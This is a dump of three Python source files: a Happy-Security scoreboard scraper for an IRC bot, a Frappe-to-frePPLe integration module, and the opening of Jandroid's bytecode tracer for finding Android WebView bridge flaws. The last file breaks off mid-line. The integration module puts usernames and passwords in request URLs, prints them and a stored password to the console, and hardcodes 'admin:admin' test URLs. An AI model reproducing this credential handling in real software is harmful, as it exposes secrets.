text stringlengths 957 885k |
|---|
<filename>tehbot/plugins/challenge/hs.py<gh_stars>1-10
from tehbot.plugins.challenge import *
import urllib.request, urllib.error, urllib.parse
import urllib.parse
import lxml.html
import re
url1 = "http://www.happy-security.de/utilities/hotlink/userscoring.php?username=%s"
url2 = "http://www.happy-security.de/?modul=hacking-zone&action=highscore&start=%s&level_id="
url3 = "http://www.happy-security.de/index.php?modul=hacking-zone&action=highscore_details&user=%s"
class Site(BaseSite):
def prefix(self):
return "[Happy-Security]"
def siteurl(self):
return "http://www.happy-security.de"
def userstats(self, user):
page = urllib.request.urlopen(url1 % Plugin.to_latin1(user), timeout=5).read()
page = page.decode("latin1")
match = page.split(":")
if len(match) != 6:
return None
rank, challs_solved, challs_total, users_total, challs_contributed, user = match
extra = None
if int(challs_contributed) > 0:
extra = " %s has contributed %d challenge%s." % (user, int(challs_contributed), "" if int(challs_contributed) == 1 else "s")
if int(rank) > 1:
try:
user2 = Site.hs_rank_to_user(int(rank) - 1)
result = urllib.request.urlopen(url1 % Plugin.to_latin1(user2), timeout=5).read().decode("latin1").split(":")
if len(result) == 6:
rank2, challs_solved2, challs_total2, users_total2, challs_contributed2, user2 = result
count = int(challs_solved2) - int(challs_solved)
if int(challs_contributed) <= int(challs_contributed2):
count += 1
if extra is None:
extra = ""
extra += " %s needs to solve %d more challenge%s to rank up." % (user, count, "" if count == 1 else "s")
except:
pass
return user, str(int(challs_solved)), int(challs_total), rank, int(users_total), None, None, extra
@staticmethod
def hs_rank_to_user(rank):
tree = lxml.html.parse(urllib.request.urlopen(url2 % rank, timeout=3))
rows = tree.xpath("//td[@class='middle']//table[@class='mtable']/tr")
if len(rows) < 2:
return ""
return rows[1].xpath("td[2]")[0].text_content().split()[0]
def rankstats(self, rank):
res = self.userstats(Site.hs_rank_to_user(rank))
user, solved, solvedmax, rank, usercount, score, scoremax, extra = res
return solved, [user], solvedmax
@staticmethod
def parse_challs(url):
challs = {}
tree = lxml.html.parse(urllib.request.urlopen(url, timeout=5))
for e in tree.xpath("//td[@class='middle']//table[@class='mtable']/tr"):
e2 = e.xpath("td[2]//a[1]")
e3 = e.xpath("td[4]/a")
if not e2 or not e3 or not e2[0].text_content() or not e3[0].text_content(): continue
solvers = int(list(filter(str.isdigit, e3[0].text_content())))
match = re.search(r'level_id=(\d+)', e2[0].xpath("@href")[0])
if match:
chall_nr = int(match.group(1))
d = e2[0].text_content()
challs[chall_nr] = (e2[0].text_content().strip(), urllib.parse.urljoin(url, e3[0].xpath("@href")[0]), solvers)
return challs
@staticmethod
def get_last_solvers(url):
tree = lxml.html.parse(urllib.request.urlopen(url, timeout=5))
solvers = []
for p in tree.xpath("//td[@class='middle']//table[@class='mtable']/tr/td[2]/a"):
solvers.append(p.text_content().strip())
return solvers
@staticmethod
def solved(user, challenge_name):
tree = lxml.html.parse(urllib.request.urlopen(url3 % Plugin.to_latin1(user), timeout=3))
for cat in tree.xpath("//td[@class='middle']//table[@class='mtable']"):
for row in cat.xpath("tr"):
chall_link = row.xpath("td[2]//a[1]")
title = row.xpath("td[8]//img/@title")
if chall_link and title and chall_link[0].text_content() == challenge_name:
return title[0].lower().find("solved=yes") > -1
return False
def solvers(self, challname, challnr, user):
challs = Site.parse_challs("http://www.happy-security.de/index.php?modul=hacking-zone")
nr, name, url, solvers = None, None, None, None
if challname is not None:
for key, val in list(challs.items()):
if val[0].lower().startswith(challname.lower()):
nr = key
name, url, solvers = val
break
if challname.lower() in val[0].lower():
nr = key
name, url, solvers = val
else:
if challnr in challs:
nr = challnr
name, url, solvers = challs[challnr]
if not name:
raise NoSuchChallengeError
cnt = solvers
solvers = Site.get_last_solvers(url)
return user, nr, name, cnt, solvers, user and Site.solved(user, name)
|
<filename>production_scheduling_shrdc/production_scheduling_shrdc/doctype/frepple_integration/frepple_integration.py
# -*- coding: utf-8 -*-
# Copyright (c) 2022, DCKY and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
import frappe
import json
from frappe.integrations.utils import make_get_request, make_post_request, create_request_log
from frappe.utils import get_request_session
import requests
from requests.structures import CaseInsensitiveDict
from datetime import datetime
'''
Naming convention:
Get request: get_{frepple document}
Post request: post_{frepple document}
'''
class FreppleIntegration(Document):
# @frappe.whitelist()
def get_demand(self):
api = 'demand'
# url,headers = get_frepple_params(api=api,filter=None)
''' With filtering'''
filter=None
# filter="?status=open"
url,headers = get_frepple_params(api=api,filter=filter)
# filter = None
ro = make_get_request(url,headers=headers) #ro is a list type, so need [] to access
# dt = datetime.fromisoformat(startdate)
name = ro[0]['name']
print(type(ro))
dd = ro[0]['due']
#convert iso8601 time type to datetime.datetime type
dt = datetime.fromisoformat(dd)
self.sales_order = name
self.delivery_date = dt
return ro
@frappe.whitelist()
def test(self):
# doc = frappe.get_doc('Frepple Integration', doc['name']) #To get the current item
print(self.password)
print(type(self.password))
# print(type(doc.password))
# return doc.password
@frappe.whitelist()
def testing(doc):
doc = json.loads(doc)
print(doc)
doc = frappe.get_doc('Frepple Integration', doc['name']) #To get the current item
print(type(doc.password))
return doc.password
def make_put_request(url, auth=None, headers=None, data=None):
if not auth:
auth = ''
if not data:
data = {}
if not headers:
headers = {}
try:
s = get_request_session()
frappe.flags.integration_request = s.put(url, data=data, auth=auth, headers=headers)
frappe.flags.integration_request.raise_for_status()
if frappe.flags.integration_request.headers.get("content-type") == "text/plain; charset=utf-8":
return parse_qs(frappe.flags.integration_request.text)
return frappe.flags.integration_request.json()
except Exception as exc:
frappe.log_error()
raise exc
# @frappe.whitelist()
# def put_demand():
# if(frappe.get_doc("Frepple Setting").frepple_integration):
# # doc = frappe.get_doc('Sales Order', doc['name']) #To get the current doc
# data = json.dumps({
# "status": "closed", #default
# })
# api = "demand/SAL-ORD-2022-00033" #equivalent sales order
# url,headers = get_frepple_params(api=api,filter=None)
# output = make_put_request(url,headers=headers, data=data)
# frappe.msgprint(
# msg='Data have been updated.',
# title='Note',
# )
# return output
@frappe.whitelist()
def get_frepple_params(api=None,filter = None):
if not api:
api = "" #default get the demand(=sales order in ERPNext) list from frepple
if not filter:
filter = ""
frepple_settings = frappe.get_doc("Frepple Setting")
temp_url = frepple_settings.url.split("//")
url1 = "http://"
url2 = frepple_settings.username + ":" + frepple_settings.password + "@"
url3 = temp_url[1] + "/api/input/"
url4 = "/"
# "/?format=json"
# "/?format=api"
#Concatenate the URL
url = url1 + url2 + url3 + api + url4 + filter
# example outcome : http://admin:admin@192.168.112.1:5000/api/input/manufacturingorder/
headers= {
'Content-type': 'application/json; charset=UTF-8',
'Authorization': frepple_settings.authorization_header,
}
print(url+ "-------------------------------------------------------------------------")
return url,headers
#Testing purpose GET request
@frappe.whitelist()
def make_request():
# url = 'https://httpbin.org/post'
url = 'https://jsonplaceholder.typicode.com/todos/1'
# headers= {
# 'Content-type': 'application/json; charset=UTF-8',
# # 'Accept': 'text/html; q=1.0, */*',
# 'Authorization': 'Bearer <KEY>',
# # 'user': 'admin',
# # 'password': '<PASSWORD>'
# }
url = 'http://admin:admin@192.168.112.1:5000/api/input/demand/?format=json'
# url = 'http://192.168.112.1:5000/api/input/demand/?format=json'
url = 'http://192.168.0.145:5000/api/input/demand/?format=json'
# url = 'http://admin:admin@172.17.0.1:5000/api/input/demand/?format=json'
# url = 'http://172.17.0.1:5000/api/input/demand/?format=json'
headers= {
'Content-type': 'application/json',
'Authorization': "<KEY>",
}
abc = make_get_request(url,headers=headers)
return abc
'''
# api = 'string' e.g 'manufacturingorder'
# filter = '?filter' e.g 'name=SALE-ORDER-005' ,'location=SHRDC&customer=Drayang'
'''
@frappe.whitelist()
def get_manufacturingorder():
api = 'manufacturingorder'
url,headers = get_frepple_params(api=api,filter=None)
''' With filtering'''
# filter = "?name=SAL-ORDER-0002"
# filter = None
# filter = "?status__contain=open"
# url,headers = get_frepple_params(api=None,filter=filter)
ro = make_get_request(url,headers=headers)
startdate = ro[0]['startdate']
#convert iso8601 time type to datetime.datetime type
dt = datetime.fromisoformat(startdate)
return ro
@frappe.whitelist()
def post_item(doc):
if(frappe.get_doc("Frepple Setting").frepple_integration):
doc = json.loads(doc) #dict form
doc = frappe.get_doc('Item', doc['name']) #To get the current item
''' Define the Frepple table you want to match'''
api = "item" #equivalent to customer doctype
url,headers = get_frepple_params(api=api,filter=None)
'''Add the item_group to frepple to use it as the owner to ensure no request error happen'''
data = json.dumps({
"name": doc.item_group,
})
output = make_post_request(url,headers=headers, data=data)
'''Add the actual item to frepple'''
data = json.dumps({
"name": doc.name,
"owner":doc.item_group,
"description":doc.item_name,
"uom":doc.stock_uom,
"cost":doc.valuation_rate,
})
output = make_post_request(url,headers=headers, data=data)
frappe.msgprint(
msg='Data have been exported to Frepple.',
title='Note',
)
return output
@frappe.whitelist()
def post_location():
if(frappe.get_doc("Frepple Setting").frepple_integration):
''' Define the Frepple table you want to match'''
api = "location"
url,headers = get_frepple_params(api=api,filter=None)
company_list = frappe.db.get_list('Company', # Find the Machine Status name via filter the workstation name
fields =['name'],
)
for company in company_list:
'''Add the company to the location table'''
data = json.dumps({
"name": company.name,
})
output = make_post_request(url,headers=headers, data=data)
warehouse_list = frappe.db.get_list('Warehouse', # Find the Machine Status name via filter the workstation name
fields =['name','company','parent_warehouse'],
)
for warehouse in warehouse_list:
'''Add the warehouse location to the location table'''
data = json.dumps({
"name": warehouse.name,
"owner":warehouse.parent_warehouse if (warehouse.parent_warehouse) else warehouse.company,
# If a warehouse is the parent warehouse, let its owner to be the company name
})
output = make_post_request(url,headers=headers, data=data)
frappe.msgprint(
msg='Data have been exported to Frepple.',
title='Note',
)
return output
@frappe.whitelist()
def post_employee(doc):
if(frappe.get_doc("Frepple Setting").frepple_integration):
doc = json.loads(doc) #dict form
doc = frappe.get_doc('Employee', doc['name']) #To get the current item
if(doc.status == "Active"):
''' Define the Frepple table you want to match'''
api = "resource" #equivalent to employee doctype
url,headers = get_frepple_params(api=api,filter=None)
'''Add a null operator to frepple to use it as the owner to ensure no request error happen'''
data = json.dumps({
"name": "Operator",#default
})
output = make_post_request(url,headers=headers, data=data)
'''Add the actual employee to frepple'''
data = json.dumps({
"name": doc.name,
"description":doc.employee_name,
"owner":"Operator" #default
})
output = make_post_request(url,headers=headers, data=data)
frappe.msgprint(
msg='Data have been exported to Frepple.',
title='Note',
)
return output
@frappe.whitelist()
def post_workstation(doc):
if(frappe.get_doc("Frepple Setting").frepple_integration):
''' Define the Frepple table you want to match'''
api = "resource" #equivalent to employee doctype
url,headers = get_frepple_params(api=api,filter=None)
temp_doc = json.loads(doc) #dict form
'''If doctype = BOM'''
if (temp_doc['doctype'] == "BOM" and temp_doc['is_active'] ): # Only add an active BOM
doc = frappe.get_doc('BOM', temp_doc['name']) #To get the current item
operations = doc.operations
# Get the workstation
for row in operations:
d = frappe.get_doc('BOM Operation', row.name) #To access child doctype
workstation = d.workstation
'''Add the workstation to frepple'''
data = json.dumps({
"name": workstation,
})
output = make_post_request(url,headers=headers, data=data)
'''If doctype = Workstation'''
if (temp_doc['doctype'] == "Workstation"):
doc = frappe.get_doc('Workstation', temp_doc['name']) #To get the current item
data = json.dumps({
"name": doc.name,
})
output = make_post_request(url,headers=headers, data=data)
frappe.msgprint(
msg='Data have been exported to Frepple.',
title='Note',
)
return output
@frappe.whitelist()
def post_customer(doc):
if(frappe.get_doc("Frepple Setting").frepple_integration):
doc = json.loads(doc) #dict form
doc = frappe.get_doc('Customer', doc['name']) #To get the current sales order
''' Define the Frepple table you want to match'''
api = "customer" #equivalent to customer doctype
url,headers = get_frepple_params(api=api,filter=None)
'''To create a cutomer with Group type first to ensure no request error happen'''
data = json.dumps({
"name": doc.customer_group,
})
output = make_post_request(url,headers=headers, data=data)
'''Create the actual customer we would like to add to'''
data = json.dumps({
"name": doc.name,
"category":doc.customer_type,
"owner":doc.customer_group
})
output = make_post_request(url,headers=headers, data=data)
frappe.msgprint(
msg='Data have been exported to Frepple.',
title='Note',
)
return output
@frappe.whitelist()
def post_supplier(doc):
if(frappe.get_doc("Frepple Setting").frepple_integration):
doc = json.loads(doc) #dict form
doc = frappe.get_doc('Supplier', doc['name']) #To get the current sales order
''' Define the Frepple table you want to match'''
api = "supplier" #equivalent to customer doctype
url,headers = get_frepple_params(api=api,filter=None)
'''Create the actual supplier we would like to add to'''
data = json.dumps({
"name": doc.name,
"category":doc.supplier_group
})
output = make_post_request(url,headers=headers, data=data)
frappe.msgprint(
msg='Data have been exported to Frepple.',
title='Note',
)
return output
@frappe.whitelist()
def post_demand(doc):
if(frappe.get_doc("Frepple Setting").frepple_integration):
#parse: mean convert string to object/dictionary
'''https://discuss.erpnext.com/t/how-to-call-external-web-service/40448/14 check this to
check eval() and how to pass it argument in data variable
'''
# NOTE
# throw in string as variable can work , e.g name = "SAL-ORDER-00012"
# throw in integer as variable can work also
# cannot pass in datetime
# duetime = eval(datetime type) cannot work, eval only accept: string, code, byte
# current_time = datetime.datetime.strptime(current_time,'%Y-%m-%d %H:%M:%S') #datetime field type pass in as string
# duetime = datetime(2022,1,16,12,25,00)# datetime(year, month, day, hour, minute, second, microsecond)
# duetime = duetime.isoformat() # Can be in any form
# json.dumps convert object to json string
doc = json.loads(doc) #dict form
doc = frappe.get_doc('Sales Order', doc['name']) #To get the current sales order
# doc = frappe.get_doc('Sales Order', 'SAL-ORD-2022-00033') #To get the current
so_items = doc.items
# Get the item and its quantity (assume only one item per sales order now)
for row in so_items:
d = frappe.get_doc('Sales Order Item', row.name) #To access child doctype
quantity = d.qty
item = d.item_name
# doc = frappe.get_doc('Sales Order', doc['name']) #To get the current doc
data = json.dumps({
"name": doc.name,
"description": "Item ordered by " + doc.customer_name, #default
"category": "", #default
"subcategory": "", #default
"item": item,
"customer": doc.customer_name,
"location": "SHRDC", #default
"due": (doc.delivery_date.isoformat()+"T00:00:00"),
"status": "open", #default
"quantity": quantity,
"priority": "10" #default
})
api = "demand" #equivalent sales order
url,headers = get_frepple_params(api=api,filter=None)
output = make_post_request(url,headers=headers, data=data)
frappe.msgprint(
msg='Data have been exported to Frepple.',
title='Note',
)
return output
@frappe.whitelist()
def post_skill(doc):
if(frappe.get_doc("Frepple Setting").frepple_integration):
doc = json.loads(doc) #dict form
doc = frappe.get_doc('Skill', doc['name']) #To get the current sales order
''' Define the Frepple table you want to match'''
api = "skill" #equivalent to customer doctype
url,headers = get_frepple_params(api=api,filter=None)
'''Create the actual supplier we would like to add to'''
data = json.dumps({
"name": doc.name,
})
output = make_post_request(url,headers=headers, data=data)
frappe.msgprint(
msg='Data have been exported to Frepple.',
title='Note',
)
return output
@frappe.whitelist()
def post_resourceskill(doc):
if(frappe.get_doc("Frepple Setting").frepple_integration):
''' Define the Frepple table you want to match'''
api = "resourceskill" #equivalent to employee doctype
url,headers = get_frepple_params(api=api,filter=None)
doc = json.loads(doc) #dict form
doc = frappe.get_doc('Employee Skill Map', doc['name']) #To get the current item
skill_list = doc.employee_skills
# Get the workstation
for row in skill_list:
d = frappe.get_doc('Employee Skill', row.name) #To access child doctype
'''Add the skill to frepple'''
data = json.dumps({
"resource":doc.employee,
"location":"work in progress",
"skill" : d.skill,
"priority":5-d.proficiency, #use priority in frepple to define how proficiency the employee is
})
output = make_post_request(url,headers=headers, data=data)
frappe.msgprint(
msg='Data have been exported to Frepple.',
title='Note',
)
return output
@frappe.whitelist()
def run_plan():
if(frappe.get_doc("Frepple Setting").frepple_integration):
filter = "/execute/api/runplan/?constraint=15&plantype=1&env=fcst,invplan,balancing,supply"
frepple_settings = frappe.get_doc("Frepple Setting")
temp_url = frepple_settings.url.split("//")
url = "http://"+ frepple_settings.username + ":" + frepple_settings.password + "@" + temp_url[1] + filter
print(url + "-----------------------------------------------------------------------")
headers= {
'Content-type': 'application/json; charset=UTF-8',
'Authorization': frepple_settings.authorization_header,
}
output = make_post_request(url,headers=headers, data=None)
frappe.msgprint(
msg='Plan have been runned succesffully',
title='Success',
)
return output
# @frappe.whitelist()
# def get_demand(self):
# api = 'demand'
# # url,headers = get_frepple_params(api=api,filter=None)
# ''' With filtering'''
# filter=None
# filter="?status=open"
# url,headers = get_frepple_params(api=None,filter=filter)
# # filter = None
# ro = make_get_request(url,headers=headers)
# # dt = datetime.fromisoformat(startdate)
# name = ro[0]['name']
# print(type(ro))
# dd = ro[0]['due']
# #convert iso8601 time type to datetime.datetime type
# dt = datetime.fromisoformat(dd)
# self.delivery_date = dt
# return ro |
import os
import re
import sys
import copy
import json
import logging
import configparser
from androguard.misc import *
from androguard.core import *
from analysis_utils import AnalysisUtils
from common import Conversions, JandroidException
TRACE_FORWARD = 'FORWARD'
TRACE_REVERSE = 'REVERSE'
STOP_CONDITION_TRUE = 'True'
STOP_CONDITION_FALSE = 'False'
STOP_CONDITION_MAYBE = 'Maybe'
class CodeTraceAdvanced:
"""Advanced code tracing."""
def __init__(self, base_dir):
"""Sets paths and initialises variables.
:param a: androguard.core.bytecodes.apk.APK object
:param d: array of androguard.core.bytecodes.dvm.DalvikVMFormat objects
:param dx: androguard.core.analysis.analysis.Analysis object
:param base_dir: string indicating script base path
"""
# Set paths.
self.path_base_dir = base_dir
# Initialise special case object.
self.special_case_object_list_reverse = {
'doInBackground': {
'Landroid/os/AsyncTask;': [
'execute([Ljava/lang/Object;)Landroid/os/AsyncTask;',
'execute(Ljava/lang/Runnable;)'
]
}
}
self.special_case_object_list_forward = {
'execute([Ljava/lang/Object;)Landroid/os/AsyncTask;': 'doInBackground',
'execute(Ljava/lang/Runnable;)V': 'doInBackground'
}
# Store returns.
self.current_returns = []
self.stop_condition = STOP_CONDITION_FALSE
def fn_reset(self):
self.androguard_apk_obj = None
self.androguard_d_array = None
self.androguard_dx = None
self.inst_analysis_utils = None
self.all_annotations = None
def fn_start_adv_trace(self, a, d, dx, code_trace_template, links,
direction=TRACE_REVERSE, max_trace_length=25):
"""Traces within code based on a trace template.
:param code_trace_template: dictionary object corresponding to the
trace part of a bug template
:param links: dictionary object containing linked items
:param direction: string indicating direction to trace
:param max_trace_length: integer indicating maximum length for
trace chains
:returns: list containing boolean value indicating whether the trace
was satisfied, and a dictionary object of updated links
"""
logging.debug('Performing advanced code trace.')
# Androguard variables for this APK.
self.androguard_apk_obj = a
self.androguard_d_array = d
self.androguard_dx = dx
# Start up utility helper.
self.inst_analysis_utils = AnalysisUtils(
self.path_base_dir,
self.androguard_apk_obj,
self.androguard_d_array,
self.androguard_dx
)
self.all_annotations = \
self.inst_analysis_utils.fn_get_all_annotations()
self.fn_get_jsinterface_classes_methods()
# Linked elements from checking previous parts of the template.
self.current_links = links
self.trace_direction = direction
self.trace_length_max = max_trace_length
# Keep track of trace chains (to be converted to RETURN items).
self.output_chains = []
bool_satisfied = False
self.fn_enumerate_trace_source_sinks(code_trace_template)
for trace_from_item in self.trace_from_main_list:
for trace_to_item in self.trace_to_main_list:
bool_single_trace_satisfied = self.fn_trace_through_code(
trace_from_item,
trace_to_item
)
if bool_single_trace_satisfied == True:
bool_satisfied = True
if bool_satisfied == True:
if 'RETURN' in code_trace_template:
self.fn_analyse_returns(code_trace_template)
# Process returns as links.
if bool_satisfied == True:
self.current_links = \
self.inst_analysis_utils.fn_convert_returns_to_links(
self.current_returns,
self.current_links
)
self.fn_reset()
# Return the outcome and the links, to be used by next code segment.
return [bool_satisfied, self.output_chains]
def fn_trace_through_code(self, trace_from, trace_to):
"""Calls methods to parse arguments and starts trace handler.
:param trace_from: string indicating start point(s) for trace
:param trace_to: string indicating end point(s) for trace
:returns: boolean indicating whether at least one path was identified
between the start and end points
"""
# Get trace types.
[self.from_class_method, trace_from_string] = \
self.fn_get_trace_type(trace_from)
[self.to_class_method, trace_to_string] = \
self.fn_get_trace_type(trace_to)
# Get any linked items.
trace_from_list = self.fn_get_trace_items(
trace_from_string,
self.from_class_method
)
trace_to_list = self.fn_get_trace_items(
trace_to_string,
self.to_class_method
)
if ((trace_from_list == []) or (trace_to_list == [])):
logging.debug('Either TraceFrom or TraceTo evaluated to None.')
return False
self.trace_to_list = trace_to_list
return self.fn_trace_handler(trace_from_list)
def fn_trace_handler(self, trace_from_list):
"""Starts the trace process and outputs the result.
:param trace_from_list: list containing possible start points
for trace
:returns: boolean indicating whether at least one path was identified
between the start and end points
"""
for trace_from in trace_from_list:
self.checked_methods = set()
self.checked_traceto_instructions = set()
# Set a stop condition.
self.stop_condition = STOP_CONDITION_FALSE
# Start the forward or reverse tracers, based on template.
if self.trace_direction == TRACE_REVERSE:
self.fn_trace_reverse(
trace_from,
trace_from,
self.trace_from_argindex,
self.from_class_method
)
else:
self.fn_trace_forward(
trace_from,
trace_from,
self.from_class_method
)
# If the output chain list is not empty, it means at least one path
# between the start and end points was identified.
if self.output_chains != []:
return True
else:
return False
def fn_trace_forward(self, trace_from, chain, class_or_method=None):
"""Performs forward tracing.
:param trace_from: string indicating starting point for trace
:param chain: string containing comma-separated "chain links"
:param class_or_method: either "<class>" or "<method">
"""
# Get class/method/desc parts.
[class_part, method_part, desc_part] = \
self.fn_determine_class_method_desc(
trace_from,
class_or_method
)
# Include subclasses.
all_classes = \
self.inst_analysis_utils.fn_find_subclasses(class_part)
all_classes.append(class_part)
for one_class in all_classes:
combined_method_string = one_class
if '.' not in method_part:
combined_method_string = combined_method_string \
+ '->' \
+ method_part
if '.' not in desc_part:
combined_method_string = combined_method_string \
+ desc_part
method_check_string = 'e' + combined_method_string
if method_check_string in self.checked_methods:
continue
self.checked_methods.add(method_check_string)
# If the trace to type doesn't care about arguments or results
# (i.e., just a class or method),
# then perform a stop condition check.
if ((self.trace_to_type != 'RESULTOF') and
(self.trace_to_type != 'ARGTO')):
self.fn_check_generic_stop_condition(combined_method_string)
if self.stop_condition == STOP_CONDITION_TRUE:
self.output_chains.append(chain)
self.stop_condition = False
continue
# Get starting points.
starting_points = \
self.inst_analysis_utils.fn_get_calls_to_method(
one_class,
method_part,
desc_part
)
for starting_point in starting_points:
num_locals = self.fn_get_locals(starting_point)
index_reg = self.fn_identify_result_reg(
starting_point,
combined_method_string
)
if index_reg == []:
continue
for tuple in index_reg:
v_reg_trace_output = self.fn_trace_v_forward(
starting_point,
tuple[0]+1,
tuple[1],
chain
)
if v_reg_trace_output == True:
self.output_chains.append(chain)
self.stop_condition = STOP_CONDITION_FALSE
continue
else:
continue
def fn_trace_v_forward(self, method, index, register, chain):
"""Traces a register forward from a starting point within a method.
:param method: Androguard EncodedMethod to trace through
:param index: instruction index (integer) to start trace from
:param register: integer value of register
:param chain: string containing comma-separated "chain links"
"""
instructions = list(method.get_instructions())
num_instructions = len(instructions)
num_locals = self.fn_get_locals(method)
[c, m, d] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_method(
method
)
method_string = c + '->' + m + d
search_string = method_string + ':' + str(index) + ':' + str(register)
method_check_string = 'i' + search_string + str(index) + str(register)
if method_check_string in self.checked_methods:
return
self.checked_methods.add(method_check_string)
new_chain = chain + ',' + method_string
for i in range(index, num_instructions):
instruction = instructions[i]
opcode = instruction.get_op_value()
operands = instruction.get_operands()
for op_index, operand in enumerate(operands):
if operand[0] != 0:
continue
if (register != operand[1]):
continue
# move
if (opcode in
[0x01, 0x02, 0x03, 0x04, 0x05,
0x06, 0x07, 0x08, 0x09]):
# If the current register (the register of interest)
# is in position 0, that means its value has been
# overwritten. Stop tracing.
if op_index == 0:
return
# If the current register is in position 1, then its value has been
# copied to another register. We should trace that register as well.
if op_index == 1:
self.fn_trace_v_forward(
method,
i+1,
operands[0][1],
chain
)
# move-result.
elif (opcode in [0x0A, 0x0B, 0x0C]):
return
# constant
elif (opcode in
[0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
0x18, 0x19, 0x1A, 0x1B, 0x1C]):
return
# aget
elif (opcode in [0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A]):
if op_index == 0:
return
if op_index == 1:
self.fn_trace_v_forward(
method,
i+1,
operands[0][1],
chain
)
# aput
elif (opcode in [0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51]):
if op_index == 0:
self.fn_trace_v_forward(
method,
i+1,
operands[0][1],
chain
)
if op_index == 1:
return
# iget
elif (opcode in [0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58]):
if op_index == 0:
return
# iput
elif (opcode in [0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F]):
if op_index == 0:
iput_dest = operands[2][2]
self.fn_trace_field_forward(iput_dest, new_chain)
# sget
elif (opcode in [0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66]):
if op_index == 0:
return
# sput
elif (opcode in [0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D]):
if op_index == 0:
sput_dest = operands[1][2]
self.fn_trace_field_forward(sput_dest, new_chain)
# invoke
elif (opcode in
[0x6E, 0x6F, 0x70, 0x71, 0x72,
0x74, 0x75, 0x76, 0x77, 0x78]):
final_operand = operands[-1][2]
if self.trace_to_type == 'ARGTO':
if final_operand in self.trace_to_list:
if self.trace_to_argindex != None:
if op_index == self.trace_to_argindex:
self.output_chains.append(new_chain)
return
else:
self.output_chains.append(new_chain)
return
# If the method is loadurl, then process further.
if ((final_operand.split('->')[1]).split('(')[0]
== 'loadUrl'):
is_webview_instance = \
self.fn_check_webview_instance(
final_operand.split('->')[0]
)
if is_webview_instance == True:
jsinterface_classes = \
self.fn_check_jsbridge(
final_operand.split('->')[0]
)
if jsinterface_classes != None:
jsinterface_methods = \
self.fn_get_all_jsinterface_methods(
jsinterface_classes
)
for jsinterface_method in jsinterface_methods:
self.fn_trace_p_forward(
jsinterface_method,
None,
new_chain
)
# Trace output.
if i != (num_instructions-1):
next_instr = instructions[i+1]
next_opcode = next_instr.get_op_value()
if next_opcode in [0x0A, 0x0B, 0x0C]:
move_result_operand = \
(next_instr.get_operands())[0][1]
self.fn_trace_v_forward(
method,
i+2,
move_result_operand,
chain
)
# If invoke-direct, then trace object.
if ((opcode in [0x70, 0x76]) and (op_index != 0)):
self.fn_trace_v_forward(
method,
i+1,
operands[0][1],
chain
)
# Trace within invoked method.
self.fn_trace_p_forward(
final_operand,
op_index,
new_chain
)
def fn_check_webview_instance(self, class_name):
"""Checks if a class is a (subclass of) webview.
:param class_name: string name of class
:returns: boolean indicating whether the class is a subclass of webview
"""
if class_name == 'Landroid/webkit/WebView;':
return True
superclasses = \
self.inst_analysis_utils.fn_find_superclasses(class_name)
for superclass in superclasses:
if superclass == 'Landroid/webkit/WebView;':
return True
return False
def fn_check_jsbridge(self, class_name):
"""Finds javascriptinterface methods for a given class.
:param class_name: string name of class
:returns: list of JavascriptInterface methods
"""
string = class_name + '->addJavascriptInterface'
if string in self.checked_methods:
return
self.checked_methods.add(string)
all_methods = self.inst_analysis_utils.fn_get_calls_to_method(
class_name,
'addJavascriptInterface',
'.'
)
output = []
for method in all_methods:
output.extend(self.fn_check_method_for_jsinterface_calls(method))
return list(set(output))
def fn_check_method_for_jsinterface_calls(self, method):
"""Checks method for presence of calls to JavascriptInterface class.
:param method: Androguard EncodedMethod
:returns: list of JavascriptInterface classes called by method
"""
output = []
for jsinterface_class in self.jsinterface_classes:
# A very unscientific way of doing this.
for instruction in list(method.get_instructions()):
if (instruction.get_op_value() not in
[0x6E, 0x6F, 0x70, 0x71, 0x72,
0x74, 0x75, 0x76, 0x77, 0x78]):
continue
last_operand = instruction.get_operands()[-1][2]
if jsinterface_class in last_operand:
output.append(jsinterface_class)
break
return list(set(output))
def fn_get_all_jsinterface_methods(self, jsinterface_classes):
"""Checks for all JavascriptInterface methods for JSinterface classes.
:param jsinterface_classes: list of JavascriptInterface classes
:returns: list of JavascriptInterface methods
"""
output = set()
for jsinterface_class in jsinterface_classes:
for jsinterface_method in self.jsinterface_methods:
if jsinterface_class in jsinterface_method:
output.add(jsinterface_method)
return list(output)
def fn_trace_p_forward(self, method_string, p_index, chain):
"""Traces registers used as operands to a method.
:param method_string: string representation of method (smali)
:param p_index: integer for specific operand index or None
for all operands
:param chain: string containing comma-separated "chain links"
"""
[class_part, method_part, desc_part] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_string(
method_string
)
new_chain = chain + ',' + method_string
all_methods = self.inst_analysis_utils.fn_get_methods(
class_part,
method_part,
desc_part
)
for methodanalysis in all_methods:
# Ignore external methods.
if methodanalysis.is_external() == True:
continue
method = methodanalysis.get_method()
# Ignore abstract methods. TODO: Get calls to.
if method.get_code() == None:
continue
num_locals = self.fn_get_locals(method)
total_registers = method.code.get_registers_size()
if p_index != None:
p_register = num_locals + p_index
self.fn_trace_v_forward(method, 0, p_register, new_chain)
else:
for i in range(total_registers-num_locals):
p_register = num_locals + i
self.fn_trace_v_forward(method, 0, p_register, new_chain)
def fn_trace_field_forward(self, field, chain):
"""Identifies "get" for field and traces the appropriate register.
:param field: string representing field
:param chain: string containing comma-separated "chain links"
"""
field_components = field.split(' ')
field = field_components[0] + ':' + field_components[1]
field = field.replace('[','\[')
all_fields = self.androguard_dx.find_fields(field)
all_field_xref_to = []
for field in all_fields:
xref_to = field.get_xref_read()
if xref_to[1] not in all_field_xref_to:
all_field_xref_to.append(xref_to[1])
for field_xref_to_method in all_field_xref_to:
[c, m, d] = \
self.inst_analysis_utils.fn_get_class_method_desc_from_method(
field_xref_to_method
)
field_xref_to_method_string = c + '->' + m + d
new_chain = chain + ',' + field_xref_to_method_string
num_locals = self.fn_get_locals(field_xref_to_method)
instructions = list(field_xref_to_method.get_instructions())
for index, instruction in enumerate(instructions):
if (instruction.get_op_value() in
[0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58,
0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66]):
operands = instruction.get_operands()
last_operand = operands[-1][2]
if last_operand != field:
